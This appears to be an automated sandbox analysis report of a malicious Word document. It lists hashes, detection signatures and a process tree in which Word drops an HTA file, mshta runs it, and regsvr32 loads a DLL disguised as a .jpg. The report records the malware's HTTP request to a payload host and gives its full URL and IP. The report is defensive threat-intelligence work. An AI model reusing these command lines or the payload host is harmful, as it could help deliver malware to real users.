Loading ...

Play interactive tourEdit tour

Windows Analysis Report enjoin,12.27.2021.doc

Overview

General Information

Sample Name:enjoin,12.27.2021.doc
Analysis ID:546767
MD5:7044bd240219ec2f83b01c532e2ce5ba
SHA1:745cdbc4a826c5960eef3f4a9aa307ff94e4b7fb
SHA256:ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Register DLL with spoofed extension
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Regsvr32 Anomaly
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Regsvr32 Command Line Without DLL
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Regsvr32 Execution With Image Extension
Queries the volume information (name, serial number etc) of a device
Document has an unknown application name
Uses code obfuscation techniques (call, push, ret)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Searches for user specific document files
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6812 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • explorer.exe (PID: 6216 cmdline: explorer i7Gigabyte.hta MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • explorer.exe (PID: 5376 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • mshta.exe (PID: 5920 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • regsvr32.exe (PID: 6280 cmdline: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5376, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5920
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5920, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, ProcessId: 6280
Sigma detected: MSHTA Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5920, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, ProcessId: 6280
Sigma detected: Regsvr32 Command Line Without DLLShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5920, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, ProcessId: 6280
Sigma detected: Suspicious Regsvr32 Execution With Image ExtensionShow sources
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5920, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, ProcessId: 6280

Data Obfuscation:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5920, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg, ProcessId: 6280
Sigma detected: Office product drops script at suspicious locationShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ProcessId: 6812, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\i7Gigabyte.hta.LNK

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: enjoin,12.27.2021.docReversingLabs: Detection: 44%
Machine Learning detection for sampleShow sources
Source: enjoin,12.27.2021.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe
Source: global trafficDNS query: name: patelboostg.com
Source: global trafficTCP traffic: 192.168.2.3:49742 -> 45.67.229.54:80
Source: global trafficTCP traffic: 192.168.2.3:49742 -> 45.67.229.54:80
Source: global trafficHTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: patelboostg.comConnection: Keep-Alive
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: mshta.exe, 0000000C.00000002.311458999.0000000002A6F000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000002.311376941.0000000002A31000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000002.311543446.0000000002A9F000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000003.307306857.0000000002A8D000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000003.307399396.0000000002A2F000.00000004.00000001.sdmpString found in binary or memory: http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.aadrm.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.aadrm.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.cortana.ai
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.diagnostics.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.office.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.onedrive.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://augloop.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://augloop.office.com/v2
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cdn.entity.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://clients.config.office.net/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://config.edge.skype.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cortana.ai
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cortana.ai/api
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://cr.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dev.cortana.ai
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://devnull.onenote.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://directory.services.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://graph.ppe.windows.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://graph.windows.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://graph.windows.net/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://invites.office.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://lifecycle.office.com
Source: mshta.exe, 0000000C.00000003.307558215.000000000A3E3000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000002.315772677.000000000A3E3000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000003.308718506.000000000A3E3000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://login.microsoftonline.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://login.windows.local
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://management.azure.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://management.azure.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://messaging.office.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ncus.contentsync.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://officeapps.live.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
